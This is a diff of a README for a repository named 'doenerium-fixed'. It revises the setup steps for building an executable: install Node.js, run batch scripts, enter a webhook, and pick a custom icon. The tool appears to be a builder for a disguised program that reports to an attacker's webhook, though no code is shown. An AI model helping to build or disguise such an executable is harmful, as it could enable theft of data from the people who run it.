doenerium6969/doenerium-fixed/README.md

 ### 📁  〢 Setting Up

-> Install [Node.js](https://nodejs.org/en/download/current) `IMPORTANT: Install NodeJS with Tools for Native Modules`
+> Install [Node.js](https://nodejs.org/en/download/prebuilt-installer/current) `IMPORTANT: Install NodeJS with Tools for Native Modules`
 >
 > ***VERY IMPORTANT***: When installing Node.js also install **"Tools for Native Modules"** => Tick `Automatically install the neccessary tools.
 Note that this will also install Chocolatey.
 The script will pop-up in a new window after the installation completes.`
 >
-> First run the `install.bat` file to install all necessary packages and `setup.bat` ask for your webhook and `build.bat` to compile exe.
+> First run the `install.bat` file to install all necessary packages and `start.bat`.
 >
-> At end of building, `build.bat` will ask you for the icon you would like to have on your executable.
+> After the build, click `Ressources` to choose an icon for your executable.
 > ``The filetype must be ".ico" and the icon should be 16x16px, 32x32px, 64x64px, 128x128px, 256x256px``
 >